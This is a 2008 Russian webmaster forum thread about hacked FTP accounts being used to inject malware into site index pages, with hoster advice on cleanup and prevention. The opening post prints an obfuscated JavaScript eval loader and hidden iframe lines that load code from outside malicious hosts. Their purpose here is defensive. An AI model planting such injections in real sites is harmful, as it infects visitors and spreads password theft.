Осторожно!!! Ломают FTP на площадках. вариант лечения.

Volkpanda · 2008-09-15T15:42:26.0000000Z

Участилось, что ломают фтп на площадках, ставят сапу и торгуют с площадок ссылками. в основном ставят код сапы, кто видел другой, пишите в топике - интересно увидеть другие варианты. на различных хостингах: мастерхост, мажордомо, агава наблюдаю такую засаду. по сообщениям от хостеров, это вирус на компьютере, который может заражать сайты. и последующий сайт передает вирус пользователю и так далее, по цепочке. уже составлен план действий, который поможет при наличии признаков заражения привести все в порядок: информация предоставлена хостингом majordomo: Судя по всему, индексные файлы сайтов Вашего аккаунта (не только упомянутых) регулярно изменяются вирусом-троянцем, использующим ваши данные для доступа FTP. В индексные файлы добавляются строки вида: <script>SSSS="267d262f267c277e [удалено] e7b7b7c2b";SS55S="";SSS55="function SS5SS() {S55SS=eval;SSS5S=unescape;SSSS5=String.fromCharCode;SSS5=Math.PI;S555S=parseInt;S55S5=S555S(~((SSS5&SSS5)|(~SSS5&SSS5)&(SSS5&~SSS5)|(~SSS5&~SSS5)));S555=S555S(((S55S5&S55S5)|(~S55S5&S55S5)&(S55S5&~S55S5)|(~S55S5&~S55S5))&1);SSSSS=S555<<S555;S5555=S55S5;for(SS5S=S55S5;SS5S<SSS55.length;SS5S-=-S555) S5555+=S555S(SSS55.charCodeAt(SS5S));S5555.toString();S5555%=SSS5S(0x64);for(SS555=S55S5;SS555<(SSSS.length>>SSSSS);SS555-=-S555) {S5S5S='';S5SSS='';for(S5S5=S55S5;S5S5<(S555<<SSSSS);S5S5-=-S555) if(S5S5<SSSSS) S5S5S+=SSSS.charAt(SS555*(SSSSS<<S555)+S5S5);else S5SSS+=SSSS.charAt(SS555*(S555<<SSSSS)+S5S5);SS55S+=SSSS5(SSS5S(0xFF)-S555S(SSS5S('%'+(((S555S(S5S5S,(SSSSS<<S555)<<SSSSS)^S5555)<15.5)?S55S5.toString():'')+Math.round(S555S(S5S5S,(SSSSS<<S555)<<SSSSS)^S5555).toString((SSSSS<<S555)<<SSSSS))+SSS5S('%'+(((S5555^S555S(S5SSS,SSSSS<<(S555+SSSSS)))<15.5)?S55S5.toString():'')+Math.round(S555S(S5SSS,SSSSS<<(S555+SSSSS))^S5555).toString(SSSSS<<(S555+SSSSS))),SSSSS<<(SSSSS+S555)));}try {S55SS(SS55S);} catch(e) {try{evalalert(SS55S);} catch(e) {SS5S5=S555;}try {if(SS5S5) {window.location='/';}} catch(e) {}}}SS5SS();";evalalert(SSS55);</script> Пожалуйста, ознакомьтесь с нижеприведенными инструкциями и примите соответствующие меры (включая смену паролей FTP): Предупреждение о вирусе Downloader.JS.* c многочисленными модификациями и кражах паролей для FTP. Данный тип вирусов распространяется следующим образом: вирус поражает компьютер клиента, если тот зашел на инфицированный сайт небезопасным браузером (например, если не установлены все последние обновления для браузера от его производителя). После этого вирус отслеживает логины и пароли от FTP-соединений в популярных программах FTP-клиентах (в большинстве случаев пароли передаются на сторону для использования с других IP-адресов). А затем вирус (либо его клон с другого IP) подключается с данными логинами и паролями по протоколу FTP и заменяет один или несколько индексных файлов на сервере, дописывая в них свой код примерно такого содержания: <iframe src="http://81.95.../traff/..." width=1 height=1></iframe> Таким образом сайт инфицируется и также начинает участвовать в распространении вируса. Вам необходимо проверить логи авторизаций в панели управления, если там только Ваши адреса, то это означает, что Ваш компьютер заражен специальным видом троянцев, использующих сохраненные FTP-пароли (в популярных FTP-клиентах) для изменения файлов на FTP-сервере. Изменения файлов в частности включают в себя добавление в конец (начало, после тега body и т.п.) индексного файла строки вида: <iframe width="0" height="0" src="http://www.mdfc.info"></iframe> Соответственно, http://www.mdfc.info это взломанный сайт либо сайт злоумышленников, который вместо заглавной страницы выдает код вируса. Советуем проверить Ваши компьютеры обновленными антивирусами и программами поиска троянских программ. После этого необходимо изменить пароли FTP и заменить индексные файлы (index*.*, либо указанные в настройках) на оригинальные либо сообщить нам, можем по запросу с контактного адреса аккаунта восстановить данные из бекапа (до 2 недель давности). В случае, если в резервных копиях сохранены зараженные копии, можем произвести поиск и чистку файлов от вирусного кода. Попутно несколько ссылок: http://vitafil.habrahabr.ru/blog/8158.html http://www.host.ru/news/2007/03/19.html http://www.viruslist.com/ru/viruses/encyclopedia?virusid=135929 отдельное спасибо сервису sape , которые блокируют сайты добавленные троянцем в систему(ну не троянцем, а мудачком, поотшибал бы пальчики на руках) отдельное спасибо арбитражу вебманей, который блокирует кошельки злоумышленников, поскольку до выяснения обстоятельств средства уже заморожены. ждем только продолжения событий. по возможности, если есть хостинги, которые пробиваются троянцем, указывайте... хостерам, думаю, стоит разослать предупреждение клиентам..

147

Volkpanda

15 сентября 2008, 18:05

#11

Hos-Ting.ru:
Volkpanda, ну и какое решение кроме как смена паролей на фтп и проверки компьютера на вирусы? :)

к примеру, Агава устроена по-смвоему..

они утверждают, что нельзя у них ограничить доступ по FTP, а разрешить его для избранных IP.

т.е програмер заходит, удаляет вирус со своего IP.. все другие входы блокируются. у них иначе - они определенный IP блокируют в черном списке по IP, но заходы с других айпишников возможны.

если прямо ответить на такой вопрос, то нужно всеже привязку доступа делать к IP.

для тех кто не в танке:

Для защиты можно много чего использовать:
Как правило при доступе FTP этого сделать нельзя, поэтому делать это придется через SSH с помощью программы Putty или через программу winscp.

я по другому мыслю: когда у меня 10 хостингов и все попали под эту атаку, то я мыслю в размере $ что всем админам придется платить за работу над удалением вируса.. в рот компот, всеже на бабки попадалово..

AS

13

Artur Shakirov

16 сентября 2008, 16:35

#12

Довольно популярный способ распространения троянов это вставки на сайты iframe блока указывающего на “вражеский сервер” с самим трояном. Перелопатить несколько тысяч страниц вручную, задача из разряда фантастических.

Ну а не вручную можно это сделать так (по ssh):

find ./ -type f -name \*.php -exec sed -i 's/^.*apartment-mall.*$//g' {} \;

Как работает, как пользоваться для тех кто в танке:

- выполнять в каталоге сайта;

- *.php менять на расширение зараженных файлов;

- подстрока apartment-mall это часть домена “вражеского” сервера.

взято с http://itblog.su/chistka-sajjta-ot-iframe-vstavok.html

122

litos0

18 сентября 2008, 17:19

#13

Кстати, вирусов которые воруют пароли на ftp существует огромное множество, пару лет точно, вообще если есть возможность, то рекомендую (на выделенных серверах легко настроить, на виртуальных тоже) использовать sftp вместо ftp, опять же тот же winscp рулит, есть плагин который ставится к FARmanager и в итоге работа ничем не отличается от обычного ftp, зато канал шифрованный и вирус не умеет по ssh ходить пока еще ...

R

180

Алексей

18 сентября 2008, 17:29

#14

Главное не храните пароли в тотале, они легко берутся вирусом.

Удаление вирусов с сайта, защита сайта, Гарантия! ( /ru/forum/999073 ) -> топик на маулталк ( http://www.maultalk.com/topic113834s0.html ) -> Топик в сапе ( http://forum.sape.ru/showthread.php?t=79363 ). TELEGRAM - https://t.me/Doktorsaitov

A

37

aftercloud

23 сентября 2008, 13:14

#15

Чаще всего ломают именно клиента. Способы предохраниться:

Регулярно обновлять антивирусное ПО, менять пароли от фтп аккаунтов. А лучше конечно работать через ssh, авторизуясь по ключам и не хранить нигде пароли.

Ударник хостингового труда!

14

webmoney03

23 сентября 2008, 13:39

#16

Спасибо ТС!!! Сделал выводы...

Что такое Power BI и зачем это нужно бизнесу

VK приобрела 70% в структуре компании-разработчика red_mad_robot